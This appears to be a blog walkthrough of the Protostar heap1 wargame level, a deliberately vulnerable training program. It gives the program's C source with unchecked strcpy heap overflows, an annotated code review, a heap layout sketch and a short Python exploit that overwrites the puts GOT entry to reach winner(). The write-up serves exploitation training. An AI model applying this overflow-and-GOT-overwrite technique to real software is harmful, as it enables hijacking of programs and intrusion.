Binary Exploitation Protostar Heap1 - Walkthrough - writeups

Hello Guyz,



Welcome again to my blog. Today, I am going to share with you my walkthrough experience of Exploit-Exercise Protostar Heap1 Level.

In This Level, Our Task Is to Execute Winner Function Through Heap Overflow Concept.


Before Starting Our Walkthrough Let's Take a Look At Hints And Details.

Note: I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
  • Understand all previous levels before starting this one.
  • Do some research on Assembly, C/C++ and Gdb
  • Do Some Research About Heap overflow exploitation.

Source Code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

  

struct internet {
  int priority;
  char *name;
};

void winner()
{
  printf("and we have a winner @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
  struct internet *i1, *i2, *i3;

  i1 = malloc(sizeof(struct internet));
  i1->priority = 1;
  i1->name = malloc(8);

  i2 = malloc(sizeof(struct internet));
  i2->priority = 2;
  i2->name = malloc(8);

  strcpy(i1->name, argv[1]);
  strcpy(i2->name, argv[2]);

  printf("and that's a wrap folks!\n");
}

Hint

This level takes a look at code flow hijacking in data overwrite cases.

This level is at /opt/protostar/bin/heap1

Code Review

  struct internet {
  int priority; 
  char *name;              <--- Noticiable Things is that, its a pointer.. means its take only 4 bytes to point to another location
};


void winner()
{
  printf("and we have a winner @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
  struct internet *i1, *i2, *i3;       <--- Create Three Pointers To Struct Internet

  i1 = malloc(sizeof(struct internet)); <--- Locating Space for First Struct Internet Pointers
  i1->priority = 1;                     <--- Insert Digit
  i1->name = malloc(8);                 <--- Locate Another Location For Char Pointer

  i2 = malloc(sizeof(struct internet)); <--- Locating Space For Second Struct Internet Pointer
  i2->priority = 2;                     <--- Insert Digit
  i2->name = malloc(8);                 <--- Locate Another Location For Char Pointer

  strcpy(i1->name, argv[1]);            <--- Copy String To i1
  strcpy(i2->name, argv[2]);            <--- Copy String To i2

  printf("and that's a wrap folks!\n");
}

Planning

  Heap Overview

                    |>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|
  -----------------------------------------------------------------------------------------------------------
 | i1 ( Name, Char Pointer ) | Paddings and Other Stuff | i2 ( Name, Char Pointer ) |  Name (8) |  Name (8) |
 ------------------------------------------------------------------------------------------------------------
                                                                          |>>>>>>>>>>>>>>>>>>>>>>>>>>>>|
                    
                    
We Just Need To Overwrite Char Pointer of i2 So, that during copying data from argument, strcpy will copy data to name location and to do it, strcpy will access the pointer of char name. and (because of us) strcpy will overwrite GOT table with argv[2] 
 
  Overflow Name And Write Data To FP

Exploit

import struct


buf = "\x90"*4*5

# Address Of Put wrapper inot global table
puts_glob = 0x08049774


# Need To Overwrite put with
win = 0x08048494



ret = struct.pack("I",win)


payload = ''
payload+= buf
payload+= struct.pack("I", puts_glob)
payload+= " "
payload+= struct.pack("I",win)
print payload

For More Detailed Walk through Check Below Provided YouTube Video Playlist



Share this

Related Posts

Previous
Next Post »